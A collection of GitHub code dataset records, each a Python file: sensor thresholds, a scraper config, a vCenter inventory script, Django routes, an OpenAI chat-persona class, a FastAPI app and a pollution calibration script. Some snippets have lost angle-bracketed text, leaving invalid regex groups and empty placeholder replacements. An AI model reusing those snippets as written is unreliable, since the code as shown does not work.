self.parts_per_billion >= 2000:\n _threshold = Threshold.RED\n elif self.parts_per_billion < 250:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass PM(float):\n 
\"\"\"Particulate matter is measured in micrograms per cubic meter of air (ug/m3).\"\"\"\n\n def __new__(cls, value):\n return super(PM, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.microgram_per_cubic_meter = value\n\n def threshold(self) -> str:\n if self.microgram_per_cubic_meter <= 0:\n _threshold = Threshold.WHITE\n elif self.microgram_per_cubic_meter >= 25:\n _threshold = Threshold.RED\n elif self.microgram_per_cubic_meter < 10:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass Humidity(float):\n \"\"\"Humidity is measured in relative humidity (%rH).\"\"\"\n\n def __new__(cls, value):\n return super(Humidity, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.relative_humidity = value\n\n def threshold(self) -> str:\n if self.relative_humidity <= 0 or self.relative_humidity > 100:\n _threshold = Threshold.WHITE\n elif self.relative_humidity < 25.0 or self.relative_humidity >= 70.0:\n _threshold = Threshold.RED\n elif (self.relative_humidity < 70.0 and self.relative_humidity >= 60.0) or (\n self.relative_humidity < 30.0 and self.relative_humidity >= 25.0\n ):\n _threshold = Threshold.YELLOW\n else:\n _threshold = Threshold.GREEN\n return _threshold\n","repo_name":"ztroop/wave-reader-utils","sub_path":"wave_reader/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"70261178329","text":"# -*- coding:utf-8 -*-\nimport os\nimport configparser\n\ncp = configparser.ConfigParser()\ncp.read(os.path.dirname(os.path.abspath(__file__))+r'/config.ini', encoding='utf-8')\n\n# user_agents\nUAS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;\",\n \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\",\n \"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11\",\n \"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\"\n ]\n\n# mongodb setting\nMD_HOST = str(cp.get('MONGODB', 'host'))\nMD_PORT = int(cp.get('MONGODB', 'port'))\nMD_DATABASE = str(cp.get('MONGODB', 'database'))\nMD_USER = str(cp.get('MONGODB', 'user'))\nMD_PWD = str(cp.get('MONGODB', 'pwd'))\n\n# mysql setting\nMS_HOST = str(cp.get('MYSQL', 'host'))\nMS_PORT = int(cp.get('MYSQL', 'port'))\nMS_DATABASE = str(cp.get('MYSQL', 'database'))\nMS_USER = str(cp.get('MYSQL', 'user'))\nMS_PWD = str(cp.get('MYSQL', 'pwd'))\n\nTV_TYPE_MAIN = 'MAIN'\nTV_TYPE_3PART = '3PART'\n\n# tv_spider_url相关\nTV_FS_MAIN_URL = str(cp.get('TV_SPIDER_URL', 'tv_fs_main'))\nTV_FS_3PART_URL = str(cp.get('TV_SPIDER_URL', 'tv_fs_3part'))\nTV_FS_URL_MAP = {TV_TYPE_MAIN: TV_FS_MAIN_URL, TV_TYPE_3PART: TV_FS_3PART_URL}\nTV_FS_URL_MAP_RE = {TV_FS_MAIN_URL: TV_TYPE_MAIN, TV_FS_3PART_URL: TV_TYPE_3PART}\n\n# tv_spider_index_url_file 相关\nTV_FS_INDEX_MAIN_FILE = str(cp.get('TV_SPIDER_INDEX_FILE', 'tv_fs_main_file'))\nTV_FS_INDEX_3PART_FILE = str(cp.get('TV_SPIDER_INDEX_FILE', 'tv_fs_3part_file'))\nTV_FS_INDEX_URL_FILE_MAP = {TV_TYPE_MAIN: TV_FS_INDEX_MAIN_FILE, TV_TYPE_3PART: TV_FS_INDEX_3PART_FILE}\n\n# 
+{"seq_id":"2379103839","text":"import streamlit as st\nfrom model import run_app\nfrom PIL import Image\n\n## streamlit app\nst.set_option(\"deprecation.showfileUploaderEncoding\", False)\n\nst.title(\"Dog or Human Classifier\")\nst.text(\n    \"Upload an Image for image classification as dog or human.\nI will also predict the dog breed in the image.\nIf you are human I will tell you which breed you look like\"\n)\n\nuploaded_file = st.file_uploader(\n    \"Upload your image here ...\", type=[\"jpg\", \"jpeg\", \"png\"]\n)\nif uploaded_file is not None:\n    image = Image.open(uploaded_file).convert('RGB')\n    run_app(image)\n    st.image(uploaded_file, use_column_width=True)\n","repo_name":"gstdl/dog-classification-streamlit","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"3457374197","text":"def read_file(filename):\n\tlines = []\n\twith open(filename, 'r', encoding='utf-8-sig') as f:\n\t\tfor line in f:\n\t\t\tlines.append(line.strip())\n\treturn lines\n\n\ndef convert(lines): # convert\n\tperson = None\n\tJ_word_count = 0\n\tJ_sticker_count = 0\n\tJ_image_count = 0\n\tS_word_count = 0\n\tS_sticker_count = 0\n\tS_image_count = 0\n\tfor line in lines:\n\t\ts = line.split(' ')\n\t\ttime = s[0]\n\t\tname = s[1]\n\t\tif name == 'J':\n\t\t\tif s[2] == '貼圖':\n\t\t\t\tJ_sticker_count += 1\n\t\t\telif s[2] == '圖片':\n\t\t\t\tJ_image_count +=1\n\t\t\telse:\n\t\t\t\tfor m in s[2:]:\n\t\t\t\t\tJ_word_count += len(m)\n\t\telif name == '紹安-2':\n\t\t\tif s[2] == '貼圖':\n\t\t\t\tS_sticker_count += 1\n\t\t\telif s[2] == '圖片':\n\t\t\t\tS_image_count += 1\n\t\t\telse:\n\t\t\t\tfor m in s[2:]:\n\t\t\t\t\tS_word_count += len(m)\n\tprint('J said', J_word_count, 'characters, sent', J_sticker_count, 'stickers and', J_image_count, 'images')\n\tprint('紹安 said', S_word_count, 'characters, sent', S_sticker_count, 'stickers and', S_image_count, 'images')\n\t\t# print(s)\n\n\ndef write_file(filename, lines):\n\twith open(filename, 'w') as f:\n\t\tfor line in lines:\n\t\t\tf.write(line + '\\n')\n\n\ndef main():\n\tlines = read_file('com.txt')\n\tconvert(lines)\n\t# write_file('output.txt', lines)\n\n\nmain()\n","repo_name":"aaaaa20021029/chat","sub_path":"r2.py","file_name":"r2.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
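A lighter way to tally per-sender message types from the same "time sender message" line layout as the chat record above (a stand-alone sketch; the sample lines are made up, not the repo's com.txt):

from collections import Counter

lines = [
    '10:01 J 早安',
    '10:02 紹安-2 貼圖',
    '10:03 J 貼圖',
]

counts = Counter()
for line in lines:
    _, name, message = line.split(' ', 2)
    kind = message if message in ('貼圖', '圖片') else 'text'
    counts[(name, kind)] += 1

print(counts)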
+{"seq_id":"8430401411","text":"import atexit\nfrom pyVmomi import vim,vmodl\nfrom pyVim.connect import SmartConnectNoSSL,Disconnect\nfrom pyVim.connect import SmartConnect\nimport operator\nimport time\nfrom datetime import timedelta\n\ndef vCenterLogin(host,user,pwd,port):\n    try:\n        si = SmartConnectNoSSL(host=host, user=user, pwd=pwd, port=port)\n        #si = SmartConnect(host=host, user=user, pwd=pwd, port=port)\n        atexit.register(Disconnect, si)\n        content = si.RetrieveContent()\n        time=si.CurrentTime()\n    except vmodl.MethodFault as error:\n        print (\"Caught vmodl fault : \" + error.msg)\n        return False, error.msg\n    return content\n\n\ndef getDatastores(content):\n    Datastores={}\n    for datacenter in content.rootFolder.childEntity:\n        datastores = datacenter.datastore\n        datastore_Info={}\n        for ds in datastores:\n            datastore_Info={}\n            name=ds.summary.name\n            if name.find(\"datastore1\",0,len(name))!=0:\n                datastore_Info[\"name\"]=ds.summary.name\n                datastore_Info[\"datastore\"]=ds.summary.datastore\n                datastore_Info[\"url\"]=ds.summary.url\n                datastore_Info[\"capacity\"]=ds.summary.capacity\n                datastore_Info[\"freeSpace\"]=ds.summary.freeSpace\n                datastore_Info[\"uncommitted\"]=ds.summary.uncommitted\n                datastore_Info[\"type\"]=ds.summary.type\n                datastore_Info[\"mantenanceMode\"]=ds.summary.maintenanceMode\n                Datastores[ds.summary.name]=datastore_Info\n    return Datastores\n\n    \n\ndef getHosts(content):\n    hostsInfo={}\n    for datacenter in content.rootFolder.childEntity:\n        if hasattr(datacenter.hostFolder, 'childEntity'):\n            hostFolder = datacenter.hostFolder\n            computeResourceList = []\n            computeResourceList = getComputeResource(hostFolder,computeResourceList)\n            for computeResource in computeResourceList:\n                hostlist=computeResource.host\n                for host in hostlist:\n                    info={}\n                    info['biosVersion']=host.hardware.biosInfo.biosVersion\n                    info['quickStats']=host.summary.quickStats\n                    info['uptime']=host.summary.quickStats.uptime\n                    info['name']=host.name\n                    info['network']=host.network\n                    info['vm']=host.vm\n                    info['memory']=host.hardware.memorySize\n                    info['cpu']=host.hardware.cpuPkg[0].description\n                    info['cpu_hz']=host.hardware.cpuPkg[0].hz\n                    info['cpu_cores']=host.hardware.cpuInfo.numCpuCores\n                    info['cpu_packages']=host.hardware.cpuInfo.numCpuPackages\n                    info['cpu_threads']=host.hardware.cpuInfo.numCpuThreads\n                    info['model']=host.hardware.systemInfo.model\n                    info['vendor']=host.hardware.systemInfo.vendor\n                    hostsInfo[host.name]=info\n    return hostsInfo\n    \n\ndef getPerfManager(content,interval,startTime,endTime):\n    perf_dict = {}\n    perfList = content.perfManager.perfCounter\n    for counter in perfList:\n        counter_full = \"{}.{}.{}\".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)\n        perf_dict[counter_full] = counter.key\n    print(BuildQuery(content, time.time(), (perf_id(perf_dict, 'net.transmitted.average')), \"\", \"10.10.10.205\", 60))\n\ndef BuildQuery(content, vchtime, counterId, instance, host, intervalId):\n    # signature aligned with the call in getPerfManager; host is currently unused\n    result={}\n    perfManager = content.perfManager\n    metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)\n    obj=content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)\n    for vm in obj.view:\n        query = vim.PerformanceManager.QuerySpec(entity=vm, metricId=[metricId], intervalId=intervalId)\n        perfResults = 
perfManager.QueryPerf(querySpec=[query])\n        result[vm.name]=perfResults\n    return result\n\n\ndef perf_id(perf_dict, counter_name):\n    counter_key = perf_dict[counter_name]\n    return counter_key\n\ndef getVM(content):\n    obj = content.viewManager.CreateContainerView(content.rootFolder, [vim.VirtualMachine], True)\n    vmInfo={}\n    for vm in obj.view:\n        vm_name=vm.name\n        list=[]\n        for datastore in vm.datastore:\n            list.append(datastore.name)\n        vmInfo[vm_name]=list\n    return vmInfo\n    \n    \n    \n\ndef getComputeResource(Folder,computeResourceList):\n    if hasattr(Folder, 'childEntity'):\n        for computeResource in Folder.childEntity:\n            getComputeResource(computeResource,computeResourceList)\n    else:\n        computeResourceList.append(Folder)\n    return computeResourceList\n","repo_name":"HsuChihwen/ZabbixReport","sub_path":"snmp/vCenter.py","file_name":"vCenter.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"2232308020","text":"from django.conf.urls import url\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns=[\n    url('^$',views.home,name = 'home'),\n    url(r'^post/(?P[0-9]+)/review_engine/$', views.rate_engine, name='rate_engine'),\n    url(r'^post/(?P[0-9]+)/review_usability/$', views.rate_usability, name='rate_usability'),\n    url(r'^post/(?P[0-9]+)/review_body/$', views.rate_body, name='rate_body'),\n    url(r'^image/(\\d+)',views.image,name ='image'),\n    url(r'^upload_image/$', views.upload_image, name='upload_image'),\n    url(r'^search/', views.search_results, name='search_results'),\n    url(r'^user/(\\d+)$', views.profile, name='profile'),\n    url(r'^profile/update/$', views.edit_profile, name='edit_profile'),\n    url(r'^comment/(?P\\d+)', views.comment, name='comment'),\n    url(r'^like/(?P\\d+)', views.like, name='like'),\n\n]\n\nif settings.DEBUG:\n    urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","repo_name":"vinnyotach7/Car-Bizz","sub_path":"carapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"14493419306","text":"#!/usr/bin/env python\n\nimport sys\nimport pandas as pd\nimport math\nimport myhw6mod as mymod\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\ntry: \n    if sys.argv[1] == \"-\":\n        lines = sys.stdin.readlines()\n    else:\n        # use open() to open a file \n        lines = open(sys.argv[1]).readlines()\nexcept:\n    print(\"Usage: %s \" % sys.argv[0])\n    sys.exit(1)\n\"\"\"\n\ntry:\n    file_name = sys.argv[1]\n    data = pd.read_csv(file_name)\nexcept:\n    print(\"Please provide a valid file name.\")\n    sys.exit(1)\n\nxlist = []\nylist = []\nsse = 0\nbad_obs = 0\n\nfor i in range(1,data.shape[0]):\n    x = mymod.haversine(data.loc[i,'pickup_longitude'],data.loc[i,'pickup_latitude'],data.loc[i,'dropoff_longitude'],data.loc[i,'dropoff_latitude'])\n    if x == 0:\n        bad_obs += 1\n        continue\n    xlist.append(x)\n    y = data.loc[i,'total_amount']/x\n    ylist.append(y)\n    sse += math.pow(x-data.loc[i,'trip_distance'],2)\n\n\nplt.scatter(xlist, ylist, marker = 'o', c= 'r', s = 40)\nplt.xlabel(\"Distance\");\nplt.ylabel(\"Cost per Mile\")\nplt.show()\n\nrmse = math.sqrt(sse/(data.shape[0]-bad_obs))\nprint(\"rmse is\",rmse)\n","repo_name":"shengzhang0830/PhD_Computing_for_Business_Research","sub_path":"HW6/PlotTaxiData.py","file_name":"PlotTaxiData.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
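The taxi record leans on mymod.haversine without showing it, so here is a stand-alone sketch of the standard haversine great-circle formula (the 3959-mile Earth radius and the JFK/Times Square coordinates are illustrative, not taken from the repo):

import math

def haversine(lon1, lat1, lon2, lat2):
    # great-circle distance in miles between two (lon, lat) points
    lon1, lat1, lon2, lat2 = map(math.radians, (lon1, lat1, lon2, lat2))
    dlon, dlat = lon2 - lon1, lat2 - lat1
    a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2
    return 2 * 3959 * math.asin(math.sqrt(a))  # 3959 mi: mean Earth radius

# JFK to Times Square, roughly 13.5 miles great-circle
print(round(haversine(-73.7781, 40.6413, -73.9855, 40.7580), 1))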
is\",rmse)\n","repo_name":"shengzhang0830/PhD_Computing_for_Business_Research","sub_path":"HW6/PlotTaxiData.py","file_name":"PlotTaxiData.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73676469207","text":"\"\"\"\nSettings for application logging\n\"\"\"\nimport coloredlogs\nimport logging\n\nfrom pysense.settings import LOG_FILE\n\nLOG_FORMAT = '%(asctime)s %(name)s %(thought)s %(levelname)s: %(message)s'\n\n\nclass CustomLogger(logging.Logger):\n \"\"\"\n Custom logger implementation\n \"\"\"\n\n def _log(self, level, msg, args,\n exc_info=None, extra=None, stack_info=None):\n if extra is None:\n extra = {}\n if 'thought' not in extra:\n extra['thought'] = 'core'\n super(CustomLogger, self)._log(\n level, msg, args, exc_info, extra, stack_info)\n\n\nlogging.setLoggerClass(CustomLogger)\npysense_logger = logging.getLogger('pysense')\npysense_logger.setLevel(getattr(logging, 'DEBUG'))\n\ncoloredlogs.install(fmt=LOG_FORMAT, level='DEBUG', logger=pysense_logger)\n\nif LOG_FILE:\n PYSENSE_FORMATTER = logging.Formatter(\n LOG_FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\n PYSENSE_HANDLER = logging.FileHandler(LOG_FILE)\n PYSENSE_HANDLER.setFormatter(PYSENSE_FORMATTER)\n pysense_logger.addHandler(PYSENSE_HANDLER)\n","repo_name":"diegorubin/pysense","sub_path":"pysense/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31285432440","text":"from unicodedata import category\nfrom rest_framework import serializers\nfrom .models import Category, Item, Order, ItemOrder\nclass CategorySerializer(serializers.ModelSerializer):\n item = serializers.SerializerMethodField()\n def get_item(self,obj):\n items = [{\n \"name\" : item_obj.name,\n \"category\" : obj.name,\n \"image_url\" : item_obj.image_url,\n \"category_id\": obj.id\n }for item_obj in obj.item_set.all()]\n return items\n class Meta:\n model = Category\n fields = [\"item\", \"name\"]\n\nclass ItemSerilizer(serializers.ModelSerializer):\n category = CategorySerializer()\n class Meta:\n model = Item\n fields = [\"name\", \"category\",\"image_url\",]\n\nclass OrderSerializer(serializers.ModelSerializer):\n item = ItemSerilizer()\n class Meta:\n model = Order \n fields = [\"delivery_address\", \"order_date\", \"item\"]\n\nclass ItemOrderSerializer(serializers.ModelSerializer):\n order = OrderSerializer()\n item = ItemSerilizer()\n class Meta:\n model = ItemOrder\n fields = [\"order\",\"item\",\"item_count\"]","repo_name":"about-joo91/morning_quiz2","sub_path":"item/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28925102700","text":"import os\nimport openai\nfrom constants import *\n\nopenai.organization = GPT_ORGANIZATION_KEY\nopenai.api_key = GPT_API_KEY\nENGINE = GPT_ENGINE\n\nclass GPTInstance:\n def __init__(self, instance_id, instance_name, instance_traits=None, instance_hobbies=None, instance_desc=None, instance_misc=None):\n \n assert(isinstance(instance_traits, list))\n assert(isinstance(instance_hobbies, list))\n \n # GPT Instance Attributes\n self.id = instance_id\n self.name = instance_name\n self.traits = instance_traits\n self.hobbies = instance_hobbies\n self.description = instance_desc\n self.misc = instance_misc\n self.full_desc = 
self.__generate_character_full_desc()\n \n # GPT Instance Data Records\n self.message_records = []\n \n \n def __get_str_hobbies(self):\n str_hobbies = \", \".join(self.hobbies)\n idx = str_hobbies.rfind(\",\")\n str_hobbies = str_hobbies[:idx+1] + \" and\" + str_hobbies[idx+1:]\n return str_hobbies\n \n \n def __get_str_traits(self):\n str_traits = \", \".join(self.traits)\n idx = str_traits.rfind(\",\")\n str_traits = str_traits[:idx+1] + \" and\" + str_traits[idx+1:]\n return str_traits\n \n \n def __generate_character_full_desc(self):\n return self.__format_stab(CHARACTER_DESC_STAB)\n \n \n def __format_stab(self, given_stab):\n res = given_stab \\\n .replace(\"\", self.name) \\\n .replace(\"\", self.description) \\\n .replace(\"\", self.__get_str_hobbies()) \\\n .replace(\"\", self.__get_str_traits())\n return res\n \n\n def train(self, friends_desc: list):\n \"\"\"\n Train GPT instance based on the given configurations.\n \n openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": \"Who won the world series in 2020?\"},\n {\"role\": \"assistant\", \"content\": \"The Los Angeles Dodgers won the World Series in 2020.\"},\n {\"role\": \"user\", \"content\": \"Where was it played?\"}\n ]\n )\n \"\"\"\n \n print(\"CALLED --\")\n assert(isinstance(friends_desc, list))\n \n training_stab = self.__format_stab(TRAINING_STAB)\n for desc in friends_desc:\n training_stab = training_stab.replace(\"\", desc)\n self.__user_message(training_stab)\n \n # try:\n # questions = TRAINING_EXAMPLES[\"user\"]\n # answers = TRAINING_EXAMPLES[\"assistant\"]\n # assert(len(questions) == len(answers))\n # except:\n # pass\n \n # for i in range(len(questions)):\n # q = self.__format_stab(questions[i])\n # self.__user_message(q)\n \n # a = self.__format_stab(answers[i])\n # self.__assistant_message(a)\n \n \n return training_stab\n # first = True\n # while True:\n # if not first:\n # message = input(\"INPUT: \")\n # self.message_records.append(self.__user_message(message))\n # first = False\n \n # print(\"/////// Waiting for reply...\\n\")\n # response = openai.ChatCompletion.create(\n # model=ENGINE,\n # messages=self.message_records\n # )\n \n # reply = response[\"choices\"][0][\"message\"][\"content\"]\n # self.message_records.append(self.__assistant_message(reply))\n # print(reply)\n # print(\"\\n===============================================================\")\n \n \n def __system_message(self, message):\n \"\"\"\n The system message helps set the behavior of the assistant. \n The assistant can be instructed with \"You are a helpful assistant.\"\n \"\"\"\n gpt_message = {\"role\": \"system\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n \n def __user_message(self, message):\n \"\"\"\n The user messages help instruct the assistant.\n They can be generated by the end users of an application, or set by a developer as an instruction.\n \"\"\"\n gpt_message = {\"role\": \"user\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n \n def __assistant_message(self, message):\n \"\"\"\n The assistant messages help store prior responses. 
\n They can help give examples of desired behavior.\n \"\"\"\n gpt_message = {\"role\": \"assistant\", \"content\": message}\n self.message_records.append(gpt_message)\n return gpt_message\n \n\n# messages = []\n# system_msg = input(\"What type of chatbot would you like to create? \")\n# messages.append({\"role\": \"system\", \"content\": system_msg})\n\n# print(\"Say hello to your new assistant!\")\n# while input != \"quit()\":\n# message = input()\n# messages.append({\"role\": \"user\", \"content\": message})\n \n# response = openai.ChatCompletion.create(\n# model=ENGINE,\n# messages=messages\n# )\n \n# reply = response\n# messages.append({\"role\": \"assistant\", \"content\": reply})\n# print(reply)\n \n# exit()\n\n\nif __name__ == \"__main__\":\n instance = GPTInstance(\n instance_id=\"C0\", \n instance_name=\"Elaina Frost\", \n instance_traits=[\n \"friendly\",\n \"honest\",\n \"diligent\"\n ],\n instance_hobbies=[\n \"violin\",\n \"painting water color\",\n \"hiking\"\n ],\n instance_desc=\"First-year Biology major university student at High Tech University. Minored in Art and Design.\"\n )\n \n instance2 = GPTInstance(\n instance_id=\"C1\", \n instance_name=\"Sarah Anderson\", \n instance_traits=[\n \"inspirational\",\n \"caring\",\n \"decisive\"\n ],\n instance_hobbies=[\n \"cooking\",\n \"video games\",\n \"puzzles\"\n ],\n instance_desc=\"First-year Food and Cooking major university student at High Tech University.\"\n )\n \n # print(instance2.full_desc)\n \n print(instance.train(friends_desc=[instance2.full_desc]))","repo_name":"ReZeroE/GPT-Simulation","sub_path":"back-end/gpt/gpt_instance.py","file_name":"gpt_instance.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23262294847","text":"import os\nimport typing\n\nfrom fastapi import FastAPI, Request, Response, status\nfrom fastapi.responses import PlainTextResponse\n\nfrom jukebox.access import log_request, log_response\nfrom jukebox.logging import Logger\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def initialize() -> None:\n # Log initialization\n Logger.info(\"Booting worker with pid: {}\", os.getpid())\n\n\n@app.on_event(\"shutdown\")\nasync def finalize() -> None:\n # Log termination\n Logger.info(\"Stopping worker with pid: {}\", os.getpid())\n\n\n@app.middleware(\"http\")\nasync def log_http_request(request: Request, call_next: typing.Callable[..., typing.Awaitable[Response]]) -> Response:\n # Log the request and response\n log_request(request)\n response: Response = await call_next(request)\n log_response(request, response.status_code)\n\n return response\n\n\n@app.exception_handler(Exception)\nasync def server_crash_handler(request: Request, exc: Exception) -> Response:\n # Log error response\n log_response(request, status.HTTP_500_INTERNAL_SERVER_ERROR, exc_info=exc)\n\n return PlainTextResponse(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n content=\"Internal Server Error\",\n )\n","repo_name":"jukebox-io/jukebox","sub_path":"jukebox/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42163773438","text":"import numpy\r\nimport pandas\r\nimport pickle\r\nfrom return_contaminant import simulated_contaminants, error_formulae\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nfrom src.library import shapefile_raster_functions\r\n\r\n\r\n# Load 
data\r\ndirectory = os.path.join(os.getcwd(), 'data')\r\ndirectory2 = os.path.join(os.getcwd(), 'results')\r\n\r\n# output\r\ncalibrated_nonadapted_location = os.path.join(directory2, \"calibrated_nonadapted.shp\")\r\n\r\n# open the input files\r\ngraph_location = os.path.join(directory, \"river_graph.pkl\")\r\ntopological_sort_location = os.path.join(directory, \"sorted_river_list.pkl\")\r\nreference_raster_location = os.path.join(directory, \"reference_raster.tif\")\r\ncontamination_df_location = os.path.join(directory, \"AGG_WWTP_df_all_adapted.csv\")\r\nscenario_number = \"\"\r\nobserved_df_location = os.path.join(directory, \"pollution_observed.csv\")\r\n\r\ncontamination_df = pandas.read_csv(contamination_df_location)\r\nobserved_df = pandas.read_csv(observed_df_location)\r\n\r\ndatapoint_locations = observed_df[\"locations\"]\r\nobserved_values = observed_df[\"contaminant\"].to_numpy()\r\ndatapoint_count = len(observed_values)\r\nopen_graph = open(graph_location, \"rb\")\r\nriver_graph = pickle.load(open_graph)\r\nriver_graph = river_graph[0]\r\nopen_graph.close()\r\nopen_ts = open(topological_sort_location, \"rb\")\r\nsorted_river_list = pickle.load(open_ts)\r\nsorted_river_list = sorted_river_list[0]\r\nopen_ts.close()\r\n\r\nk, filt_eff, s_eff, t_eff = [0.00995203, 0.99993389, 0.63221308, 0.81011981]\r\n\r\nbeta_0 = 1\r\ngr, rl, cont, sc_nr, locs, obs = [river_graph, sorted_river_list, contamination_df, '', datapoint_locations,\r\n observed_values]\r\nsim_results, discharges = simulated_contaminants(filt_eff, s_eff, t_eff, k, beta_0, gr, rl, cont, sc_nr,\r\n locs, obs)\r\ndischarges = discharges/numpy.mean(discharges)\r\ndischarge_weights = numpy.sqrt(discharges)\r\nimplied_excretion = numpy.mean(obs)/numpy.mean(sim_results)\r\nimplied_excretion = numpy.mean(obs*discharge_weights) / numpy.mean(sim_results*discharge_weights)\r\n#implied_excretion = numpy.sum(sim_results*obs*discharges) / numpy.sum(sim_results**2 * discharges)\r\nsim_results *= implied_excretion\r\nprint(implied_excretion)\r\nerror, mean_error = error_formulae(obs, sim_results, discharges, option=0, weighted=1)\r\nprint(1 - error / mean_error)\r\n\r\nplt.plot(obs, sim_results, 'o')\r\nplt.plot(sim_results, sim_results)\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\nplt.plot(numpy.log(1+obs), numpy.log(1+sim_results), 'o')\r\nplt.plot(numpy.log(1+sim_results), numpy.log(1+sim_results))\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\nplt.plot(obs*discharge_weights, sim_results*discharge_weights, 'o')\r\nplt.plot(sim_results*discharge_weights, sim_results*discharge_weights)\r\nplt.xlabel(\"Prediction\")\r\nplt.ylabel(\"Outcome\")\r\nplt.show()\r\nplt.clf()\r\n\r\n# log error\r\nsim_results_log = numpy.log(1 + sim_results*discharges)\r\nobs_log = numpy.log(1 + obs*discharges)\r\nobs_log_mean = numpy.mean(obs_log)\r\nlog_error = numpy.square(sim_results_log - obs_log)\r\nlog_var = numpy.square(obs_log - obs_log_mean)\r\nlog_R_sqr = 1 - numpy.sum(log_error)/numpy.sum(log_var)\r\nprint(\"log squared error: \" + str(log_R_sqr))\r\n\r\nnormal_error = numpy.square(sim_results-obs)\r\nmean_error = numpy.square(obs-numpy.mean(obs))\r\nnormal_R_sqr = 1 - numpy.sum(normal_error)/numpy.sum(mean_error)\r\nprint(\"normal squared error: \" + str(normal_R_sqr))\r\n\r\ndistance_error = numpy.abs(sim_results-obs)\r\nabsolute_dev = numpy.abs(obs-numpy.mean(obs))\r\ndistance_explained = 1 - 
numpy.sum(distance_error)/numpy.sum(absolute_dev)\r\nprint(\"distance to mean error: \" + str(distance_explained))\r\n\r\nabsolute_dev = numpy.abs(obs-numpy.median(obs))\r\ndistance_explained = 1 - numpy.sum(distance_error)/numpy.sum(absolute_dev)\r\nprint(\"distance to median error: \" + str(distance_explained))\r\n\r\npercentage_error = numpy.abs(sim_results-obs)/(obs+1)\r\npercentage_error = numpy.mean(percentage_error)\r\nprint(\"percentage error: \" + str(percentage_error))\r\n\r\nerror_of_sum = 1 - numpy.sum(distance_error)/numpy.sum(obs)\r\nprint(\"error of sum: \" + str(error_of_sum))\r\n\r\n# create shapefile\r\ndischarges = discharges / numpy.mean(discharges)\r\ndataframe = pandas.DataFrame()\r\ndataframe['locations'] = locs\r\ndataframe['Prediction'] = sim_results\r\ndataframe['Observations'] = obs\r\ndataframe['Error'] = (dataframe['Prediction'] - dataframe['Observations'])**2\r\ndataframe['Error'] = dataframe['Error'] / numpy.mean(dataframe['Error'])\r\ndataframe['weighted error'] = dataframe['Error'] * numpy.sqrt(discharges)\r\ndataframe['weighted error'] = dataframe['weighted error'] / numpy.mean(dataframe['weighted error'])\r\nshapefile_raster_functions.contaminant_to_shapefile(dataframe, reference_raster_location, 